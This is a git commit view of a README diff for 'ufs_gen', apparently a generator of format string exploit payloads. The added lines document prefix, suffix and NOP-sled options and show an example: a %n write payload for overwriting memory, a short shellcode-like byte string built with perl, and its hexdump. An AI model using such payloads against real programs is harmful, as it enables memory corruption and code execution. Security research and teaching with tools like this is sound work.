summaryrefslogtreecommitdiff
path: root/README
diff options
context:
space:
mode:
authorOlivier Gayot <duskcoder@gmail.com>2014-01-27 12:43:44 +0000
committerOlivier Gayot <duskcoder@gmail.com>2014-01-27 12:43:44 +0000
commit9aa9983fb7e737d2fa7d1c61b1f26411dbd04407 (patch)
tree68a57cd561cf3fe0e0d8faf417c2276e14836f32 /README
parenta9f072448d2ffd9f1f275367533945e7a92237a3 (diff)
update the usage message and the README
Refs: #1
Diffstat (limited to 'README')
-rw-r--r--README20
1 files changed, 20 insertions, 0 deletions
diff --git a/README b/README
index b2d9679..d8d3358 100644
--- a/README
+++ b/README
@@ -38,12 +38,32 @@ is not 4 bytes long, there is very few chances that it would work correctly.
The support of printf(payload) directly (i.e. without a temporary buffer) is
also planned.
+We support the option --prefix and --suffix which respectively prepend and
+append their argument to the payload.
+
+We also support the option --sfxnops which adds n NOP byte (0x90) between the
+payload and the suffix
+
Example
=======
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
+user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
+user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C
+NOP bytes are at offset 52 (0x34)
+suffix is at offset 152 (0x98)
+00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".|
+00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5|
+00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x|
+00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............|
+00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
+*
+00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D|
+0000009f
+
+
License
=======